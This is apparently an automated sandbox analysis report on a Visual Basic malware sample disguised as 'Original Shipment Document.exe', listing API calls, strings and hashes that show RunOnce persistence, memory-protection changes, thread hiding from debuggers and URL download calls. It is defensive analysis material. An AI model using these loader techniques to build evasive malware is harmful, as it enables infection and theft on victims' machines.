__vbaVarTstEq.MSVBVM60(?,?), ref: 004097F3
__vbaFreeVar.MSVBVM60 ref: 004097FA
__vbaVarTstEq.MSVBVM60(?,00008008), ref: 0040982E
__vbaStrCat.MSVBVM60(00407BA0,00407B98), ref: 00409849
__vbaStrMove.MSVBVM60 ref: 00409856
__vbaStrCat.MSVBVM60(00407BDC,00000000), ref: 0040985E
__vbaStrMove.MSVBVM60 ref: 00409865
__vbaStrCat.MSVBVM60(00407B98,00000000), ref: 0040986D
__vbaStrMove.MSVBVM60 ref: 00409874
__vbaStrCat.MSVBVM60(00407BA0,00000000), ref: 0040987C
__vbaStrMove.MSVBVM60 ref: 00409883
__vbaStrCat.MSVBVM60(00407BDC,00000000), ref: 0040988B
__vbaStrMove.MSVBVM60 ref: 00409892
__vbaStrCat.MSVBVM60(00407B98,00000000), ref: 0040989A
__vbaStrMove.MSVBVM60 ref: 004098A1
__vbaStrCat.MSVBVM60(00407BA0,00000000), ref: 004098A9
#687.MSVBVM60(?,?), ref: 004098B9
__vbaDateVar.MSVBVM60(?), ref: 004098C3
__vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 004098E5
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004098F5
__vbaFreeStr.MSVBVM60(00409944), ref: 0040993D

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Free$List$#526#687CopyDate
String ID:
API String ID: 141431133-0
Opcode ID: 84eb5977acb290aad12a9c2ff96b18e2204547c63613a75bae58037c04d821c6
Instruction ID: 6792227ef33a67a0fffa444f564c1ed3a02cdd70a1d2b28ca540aa9432715c7a
Opcode Fuzzy Hash: 84eb5977acb290aad12a9c2ff96b18e2204547c63613a75bae58037c04d821c6
Instruction Fuzzy Hash: 1D51DAB2D10218ABDB14EFE4DD859DEBBB8EF48700F20412BE501B7291DBB46945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00408E70, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 111COMMON

Download Yara Rule

APIs

__vbaStrCat.MSVBVM60(00407A94,00407A8C), ref: 00408EBA
__vbaStrMove.MSVBVM60 ref: 00408ECB
__vbaI4Str.MSVBVM60(00000000), ref: 00408ECE
#537.MSVBVM60(00000000), ref: 00408ED5
__vbaStrMove.MSVBVM60 ref: 00408EE0
__vbaStrCmp.MSVBVM60(00407A9C,00000000), ref: 00408EE8
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408F01
#670.MSVBVM60(?), ref: 00408F17
__vbaVarTstEq.MSVBVM60(?,?), ref: 00408F33
__vbaFreeVar.MSVBVM60 ref: 00408F3F
__vbaHresultCheckObj.MSVBVM60(00000000,?,004076A8,00000160), ref: 00408F70
__vbaNew2.MSVBVM60(00407AF0,0040B338), ref: 00408F88
__vbaObjSet.MSVBVM60(?,?,HAUST), ref: 00408FA6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407AE0,00000040), ref: 00408FC0
__vbaFreeObj.MSVBVM60 ref: 00408FC9

Strings

Autentificer3, xrefs: 00408F25
HAUST, xrefs: 00408F97

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#537#670ListNew2
String ID: Autentificer3$HAUST
API String ID: 4208813872-467761117
Opcode ID: f335caba01f14630c8d3aca109b7ec745f455ecd932968e117f7e5fb03cafc5e
Instruction ID: b552c3b36c3757b5c823713e7eae240ad37c5337c9ac182ffb3e40bd05e1629e
Opcode Fuzzy Hash: f335caba01f14630c8d3aca109b7ec745f455ecd932968e117f7e5fb03cafc5e
Instruction Fuzzy Hash: 37415E71D40259ABCB109FA1DE499AFBBB8FF58701F10412AF942B31A0DB781945CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1D0, Relevance: 25.6, APIs: 17, Instructions: 93COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0040A21F
__vbaStrCopy.MSVBVM60 ref: 0040A227
__vbaStrCat.MSVBVM60(00407A94,00407A8C), ref: 0040A233
__vbaStrMove.MSVBVM60 ref: 0040A23E
__vbaI4Str.MSVBVM60(00000000), ref: 0040A245
#698.MSVBVM60(?,00000000), ref: 0040A250
__vbaVarTstEq.MSVBVM60(?,?), ref: 0040A26C
__vbaFreeStr.MSVBVM60 ref: 0040A277
__vbaFreeVar.MSVBVM60 ref: 0040A286
#538.MSVBVM60(?,000007DB,0000000B,0000000B), ref: 0040A29A
#557.MSVBVM60(?), ref: 0040A2A4
__vbaFreeVar.MSVBVM60 ref: 0040A2BC
#706.MSVBVM60(00000001,00000000,00000000), ref: 0040A2C7
__vbaStrMove.MSVBVM60 ref: 0040A2D2
__vbaFreeStr.MSVBVM60(0040A312), ref: 0040A305
__vbaFreeStr.MSVBVM60 ref: 0040A30A
__vbaFreeStr.MSVBVM60 ref: 0040A30F

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CopyMove$#538#557#698#706
String ID:
API String ID: 1813853073-0
Opcode ID: 9e560250f46b882da8aff90720311971fd2417f7616b7ff6fbe01b7d22eb21b8
Instruction ID: 42d09ec974a8dafb2408ad2512df4d1773d221fd9579039ae78e7a6a3c869b60
Opcode Fuzzy Hash: 9e560250f46b882da8aff90720311971fd2417f7616b7ff6fbe01b7d22eb21b8
Instruction Fuzzy Hash: 97315B71D00259ABCB14DFE5DE489DEBBB8EF58700F10412AE502B76A0DB782E05CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00409970, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

__vbaStrCat.MSVBVM60(00407BF0,00407BE4), ref: 004099C6
__vbaStrMove.MSVBVM60 ref: 004099CD
__vbaStrCat.MSVBVM60(0-10,00000000), ref: 004099D9
#557.MSVBVM60(?), ref: 004099E9
__vbaFreeStr.MSVBVM60 ref: 00409A01
__vbaFreeVar.MSVBVM60 ref: 00409A0A
__vbaNew2.MSVBVM60(00407AF0,0040B338), ref: 00409A27
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407AE0,00000014), ref: 00409A4C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407B00,00000070), ref: 00409A70
__vbaFreeObj.MSVBVM60 ref: 00409A79

Strings

0-10, xrefs: 004099D4

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#557MoveNew2
String ID: 0-10
API String ID: 3665183410-25085200
Opcode ID: 5293c3dd407a9a9a8a978f15a944b9f23186a95add78b5031aa2f5a1b6d8cd50
Instruction ID: 36c4693957bc088ef657c77797ac96120e96d22e8cbe46c5a0cc6d3dc5cb9239
Opcode Fuzzy Hash: 5293c3dd407a9a9a8a978f15a944b9f23186a95add78b5031aa2f5a1b6d8cd50
Instruction Fuzzy Hash: C1315E71D00254AFCB10DFA5DE49A9EBBB8EF58B00B204126F402F32A1D7786D40CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409610, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 87COMMON

Download Yara Rule

APIs

__vbaStrCat.MSVBVM60(1/01,01/0), ref: 0040965A
#553.MSVBVM60(?,?), ref: 00409672
__vbaVarTstEq.MSVBVM60(?,?), ref: 0040968E
__vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 004096A1
__vbaNew2.MSVBVM60(00407AF0,0040B338), ref: 004096C1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407AE0,00000014), ref: 004096E6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407B00,000000B8), ref: 00409710
__vbaFreeObj.MSVBVM60 ref: 00409719

Strings

1/01, xrefs: 00409640
01/0, xrefs: 0040963B

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$#553ListNew2
String ID: 01/0$1/01
API String ID: 2880681753-2106583123
Opcode ID: 7db6ed51e536cc2478e894ea7e7a082eefe4571636d783470731c288a5efe1dc
Instruction ID: d817434e78c2b02d5424247b8bbffc92245112be64fa057f67189a2598dace8c
Opcode Fuzzy Hash: 7db6ed51e536cc2478e894ea7e7a082eefe4571636d783470731c288a5efe1dc
Instruction Fuzzy Hash: 4A315AB1D40248ABCB14DF95CD49ADEBBB8FB58700F20802AF511B72A1D7B86945CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A390, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__vbaVarMove.MSVBVM60 ref: 0040A3A5
__vbaFreeVar.MSVBVM60 ref: 0040A3AE
#651.MSVBVM60 ref: 0040A3CC
__vbaStrMove.MSVBVM60 ref: 0040A3D7
__vbaFreeStr.MSVBVM60(0040A40B), ref: 0040A3FB
__vbaFreeVar.MSVBVM60 ref: 0040A404

Strings

`, xrefs: 0040A3BB

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#651
String ID: `
API String ID: 1588789721-2105771762
Opcode ID: d8a10fd85475df32bd87907c13f0290791f4169d16044f1350410a7f384dd666
Instruction ID: 8664c5dc990f33c12f4dfb065d21e12c9817bdaaad8a16c2e2b6a5c4a7ca0a84
Opcode Fuzzy Hash: d8a10fd85475df32bd87907c13f0290791f4169d16044f1350410a7f384dd666
Instruction Fuzzy Hash: 52F0E771D0018ACFCF04CFA0DA588EDBBB0FF14305F00012AE506B65B0EB74168ACB19

Uniqueness

Uniqueness Score: -1.00%

Function 00409020, Relevance: 10.6, APIs: 7, Instructions: 68COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00409066
__vbaNew2.MSVBVM60(00407AF0,0040B338,?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 0040907E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407AE0,00000014), ref: 004090A3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407B00,00000118), ref: 004090CD
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 004090D6
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 004090DF
__vbaFreeStr.MSVBVM60(00409100,?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 004090F9

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$CopyNew2
String ID:
API String ID: 3978771648-0
Opcode ID: 1571910ea9c8332806f55c1f7e699691d2f5519199847bf08779d32f99494d76
Instruction ID: 1331a55497e13a8e5b541ce2100e86ce395e035ec3649c9d561b832bf08f443c
Opcode Fuzzy Hash: 1571910ea9c8332806f55c1f7e699691d2f5519199847bf08779d32f99494d76
Instruction Fuzzy Hash: ED213E74940209EFCB04DF95CE49A9EBBB8FF58701F20406AF901B72A1C7786941CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409120, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00407AF0,0040B338), ref: 00409163
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407AE0,00000014), ref: 00409188
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00407B00,00000138), ref: 004091B5
__vbaFreeObj.MSVBVM60 ref: 004091BE

Strings

Hemes, xrefs: 00409195

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2
String ID: Hemes
API String ID: 4261391273-869270707
Opcode ID: c16e609af322603ab6a48250c9fb5460a8092d12dbf70ff37c2f94f90519d5fe
Instruction ID: 46371e6e3c2d0bb54e59f88fcc9a6ac6bba70722e040b07d9112e2040592b775
Opcode Fuzzy Hash: c16e609af322603ab6a48250c9fb5460a8092d12dbf70ff37c2f94f90519d5fe
Instruction Fuzzy Hash: A8117370A41305ABD710DB95CE4DF9B7BB8EB14B05F200035B841B71D1D3B869448BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00409E20, Relevance: 7.6, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00407AF0,0040B338,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00409E6F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407AE0,00000014,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00409E94
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407B00,00000118,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00409EBE
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00409EC7
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00409ED0

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2
String ID:
API String ID: 4261391273-0
Opcode ID: 36cfe78f29e3c09b746e5aa069b489f4b3652ac835667800788afc6cfe66b577
Instruction ID: 24bfdc45f40290865007f9abb8930ee037942d1be893c29113eb325c82b27b28
Opcode Fuzzy Hash: 36cfe78f29e3c09b746e5aa069b489f4b3652ac835667800788afc6cfe66b577
Instruction Fuzzy Hash: 59112E75940204ABCB00DF95CD49E9BBBB8FF58705F20402AF901B72E1D7785941CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408B00, Relevance: 7.5, APIs: 5, Instructions: 31COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00408B36
__vbaCyStr.MSVBVM60(00407A18), ref: 00408B41
__vbaFpCmpCy.MSVBVM60(00000000), ref: 00408B4F
#554.MSVBVM60 ref: 00408B59
__vbaFreeStr.MSVBVM60(00408B6F), ref: 00408B68

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: __vba$#554CopyFree
String ID:
API String ID: 2940475601-0
Opcode ID: cae12e8e4e01de0cc77f7260410b774ffb194afe6f7dfc6b0b94e93b14166192
Instruction ID: 28744c9ac237089a20ab6c473257e66f05a8d1a1c87293d462f1727af7f97d32
Opcode Fuzzy Hash: cae12e8e4e01de0cc77f7260410b774ffb194afe6f7dfc6b0b94e93b14166192
Instruction Fuzzy Hash: 10F062B0900245EBCB00DF94DF4DBAE7B78EB48B02F104439F541B66A0DB785504CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00409D40, Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00407AF0,0040B338,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00409D8F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407AE0,00000014,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00409DB4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407B00,00000078,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00409DD8
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00409DE1

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2
String ID:
API String ID: 4261391273-0
Opcode ID: 1a0986c42d3397f539604c6f53f904faa0877dc0b169b0e07f298ac06c609bff
Instruction ID: 3914fe84125b39e27bca2b4aaa11809202cd1b0aa58914a589e638f5bb7cb1cc
Opcode Fuzzy Hash: 1a0986c42d3397f539604c6f53f904faa0877dc0b169b0e07f298ac06c609bff
Instruction Fuzzy Hash: A3115470D40704ABCB00DF95CD49E9BBBB9FF54701F244026F405B72A1C7789941CBA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Original Shipment Document.exe PID: 5240 Parent PID: 5852 Original Shipment Document.exeCOMMON

Executed Functions

Function 0056032B, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 119nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF), ref: 00560365

Strings

name1.exe, xrefs: 00561CE1
W.E, xrefs: 00561C72
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00561C95

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: W.E$Software\Microsoft\Windows\CurrentVersion\RunOnce$name1.exe
API String ID: 2706961497-2825018100
Opcode ID: 25935271557574316ded1343f2248e7dceaa737a3fc5d6ac883bcb31b7af0c83
Instruction ID: c27f20a65ab13d684c4853d0f3125513951cb5ece8f4d5c7eb3b7dead601f553
Opcode Fuzzy Hash: 25935271557574316ded1343f2248e7dceaa737a3fc5d6ac883bcb31b7af0c83
Instruction Fuzzy Hash: 95315A72680289ABE7219F20CC4AFAB3F65FB57719F292568F144671D2C7B09C40C31C

Uniqueness

Uniqueness Score: -1.00%

Function 00560DCE, Relevance: 4.6, APIs: 3, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

RtlAddVectoredExceptionHandler.NTDLL(?,Function_00001471), ref: 00560DD3
NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,00000000), ref: 00560E31

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: ExceptionHandlerMemoryProtectVectoredVirtual
String ID:
API String ID: 1128486366-0
Opcode ID: d48fe998586637f3803e64042d810a46229eb0df9c5622b3f53f1ec343db5f43
Instruction ID: 5eab2709401c525c37f2f726490f99188119e235b5653602e51bc7be5868fa39
Opcode Fuzzy Hash: d48fe998586637f3803e64042d810a46229eb0df9c5622b3f53f1ec343db5f43
Instruction Fuzzy Hash: 722181F12007019FD3249F64C889FAABB68FF55366F258694F4164B2B2C774D984CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00560D7C, Relevance: 4.6, APIs: 3, Instructions: 70threadnativeCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_000013FD,00000000,00000000,00000000), ref: 00560DB6
TerminateThread.KERNEL32(000000FE,00000000), ref: 00560DC1

Part of subcall function 00560DCE: RtlAddVectoredExceptionHandler.NTDLL(?,Function_00001471), ref: 00560DD3
Part of subcall function 00560DCE: NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,00000000), ref: 00560E31

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 005614D0

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectThreadVirtual$CreateExceptionHandlerTerminateVectored
String ID:
API String ID: 4104512072-0
Opcode ID: 94e768abdceb6dc43b49afd4212c9b7f928f5904d56a548124d723582ff162f1
Instruction ID: 2f440d4b4b4d4e1033b9bc7816fc2457c002f6e97beb22bbd2f6d70c42ec1a10
Opcode Fuzzy Hash: 94e768abdceb6dc43b49afd4212c9b7f928f5904d56a548124d723582ff162f1
Instruction Fuzzy Hash: C901D6B1200701AFE7309BA4CC8AFBA7A24FB56B26F345780F5174B2E1C3B4D441C929

Uniqueness

Uniqueness Score: -1.00%

Function 005613FD, Relevance: 3.0, APIs: 2, Instructions: 40sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 00561429
NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00561452

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: e1c4dee1711afd669568abff9b92ecd029ef6057e31a707c68cc0e3c40dae472
Instruction ID: 269072a0e062a25ea0667c57e32074ae4093e301eaa119e8cb0013edc67e64bd
Opcode Fuzzy Hash: e1c4dee1711afd669568abff9b92ecd029ef6057e31a707c68cc0e3c40dae472
Instruction Fuzzy Hash: 93F0A9B02407419FE3649F20C88DF697AA4FF15356F2A8A80F0154B2E6C7B48A80CA24

Uniqueness

Uniqueness Score: -1.00%

Function 00562D96, Relevance: 1.6, APIs: 1, Instructions: 102nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(00000004,?,?,?,?,?,?,?,005600B8), ref: 00562EA9

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 17f3a473bba363d754c64172ba03aa9e4ac5924902b9d6a3edb42f04fcd20ba0
Instruction ID: d044a3594f9d27a3a179039a97b3c6dbe41b86fc1a78e8fc249f081ba01f2a39
Opcode Fuzzy Hash: 17f3a473bba363d754c64172ba03aa9e4ac5924902b9d6a3edb42f04fcd20ba0
Instruction Fuzzy Hash: 3221F731700D058EEB288AA0C94C7F67BAEFB51325F885565D1298B6A0D7358E84CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00562DCC, Relevance: 1.6, APIs: 1, Instructions: 95nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(00000004,?,?,?,?,?,?,?,005600B8), ref: 00562EA9

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 7efd7ac1c3157b96f7a324546404ddcb9ae115ba0e504e97a2816b2221557ba1
Instruction ID: 406b8824f301ac19cccfb680fd0fe581c589c72a1d6bbeea2ff7682fc3c477af
Opcode Fuzzy Hash: 7efd7ac1c3157b96f7a324546404ddcb9ae115ba0e504e97a2816b2221557ba1
Instruction Fuzzy Hash: 7B212C31700D058EEB398EA0C94C7F67BAEFF51325F8855A4D5298B6A0D735CE84CA71

Uniqueness

Uniqueness Score: -1.00%

Function 00562D90, Relevance: 1.6, APIs: 1, Instructions: 89nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(00000004,?,?,?,?,?,?,?,005600B8), ref: 00562EA9

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 553371321239f1815cdb2e7ce1fa476dac839d85f52919c042efb99f21a9da21
Instruction ID: 5582bea45be4fd0e522b2a13fd4ccfb7b35087c81f7fb3fc560b1786f06e5eee
Opcode Fuzzy Hash: 553371321239f1815cdb2e7ce1fa476dac839d85f52919c042efb99f21a9da21
Instruction Fuzzy Hash: C1212670700E058EEF299E74C8587B47E67FB52325F595678D1298B2E0C37A8CC4CA50

Uniqueness

Uniqueness Score: -1.00%

Function 00561471, Relevance: 1.6, APIs: 1, Instructions: 56nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 005614D0

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 2c2e70ba40ef62fdd95188989695b62f4fa909e6994c349569e0d42a9212f7c3
Instruction ID: 75397ad412ce3cba097e68974d917c98a55e14d9d015417d04cf5593d6bbc6f2
Opcode Fuzzy Hash: 2c2e70ba40ef62fdd95188989695b62f4fa909e6994c349569e0d42a9212f7c3
Instruction Fuzzy Hash: 9A0181F12006019FD320CBA4C98AF66BA68FB66726F254691F113873F2C274D941CA39

Uniqueness

Uniqueness Score: -1.00%

Function 0056146B, Relevance: 1.6, APIs: 1, Instructions: 53nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00560DCE: RtlAddVectoredExceptionHandler.NTDLL(?,Function_00001471), ref: 00560DD3
Part of subcall function 00560DCE: NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,00000000), ref: 00560E31

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 005614D0

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual$ExceptionHandlerVectored
String ID:
API String ID: 4193742754-0
Opcode ID: 67e7ff39abdc7119780d48100d1fff2e81145329834d18962339988853e45813
Instruction ID: 076a525202a7748c93a4baa42fa9b7e91f7811353d043a6508c7a419596f729c
Opcode Fuzzy Hash: 67e7ff39abdc7119780d48100d1fff2e81145329834d18962339988853e45813
Instruction Fuzzy Hash: 39F0AFF12006019FD320DBB4C9CAE6ABA68FB56726F255691F113873F2C374D941CA39

Uniqueness

Uniqueness Score: -1.00%

Function 00562A10, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000000,?,005627D4,00000040,005601FE,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00562A29

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 005616D0, Relevance: 3.1, APIs: 2, Instructions: 103networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00561AEB,00000000,00000000,00000000,00000000,00560229,?,?,?,?,?,?,?,005600B8), ref: 00561709
InternetOpenUrlA.WININET(?,0000009C,00000000,00000000,84000100,00000000,?,?,?,?,00000004), ref: 0056176B

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: af3fed67d26f5b1c34becef7106e6d1814b4c46cae74c55300c2a104342c79e2
Instruction ID: abc7671361b229a33794da2c2cadce870832d3c557118304e9d7ee3f44a0ebcb
Opcode Fuzzy Hash: af3fed67d26f5b1c34becef7106e6d1814b4c46cae74c55300c2a104342c79e2
Instruction Fuzzy Hash: 56317171140386ABEB319F60CD89FEE3A76FF80B00F149814FD09AB690D7B59615DB24

Uniqueness

Uniqueness Score: -1.00%

Function 005616D8, Relevance: 3.1, APIs: 2, Instructions: 99networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00561AEB,00000000,00000000,00000000,00000000,00560229,?,?,?,?,?,?,?,005600B8), ref: 00561709
InternetOpenUrlA.WININET(?,0000009C,00000000,00000000,84000100,00000000,?,?,?,?,00000004), ref: 0056176B

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 6f24e9551acbdb81ca189bc9b410cd2b4fa2738a26c88971404b6179fce86c02
Instruction ID: b75c7b14d2b38b248859ef887391fac4590ad949287c3dc331ce636e0603cd50
Opcode Fuzzy Hash: 6f24e9551acbdb81ca189bc9b410cd2b4fa2738a26c88971404b6179fce86c02
Instruction Fuzzy Hash: 6B214F7124038AAAEB708E50CE49FFF3B7DFB40B40F549415FE49AB681EB7496049A35

Uniqueness

Uniqueness Score: -1.00%

Function 00560D8A, Relevance: 3.0, APIs: 2, Instructions: 28threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_000013FD,00000000,00000000,00000000), ref: 00560DB6
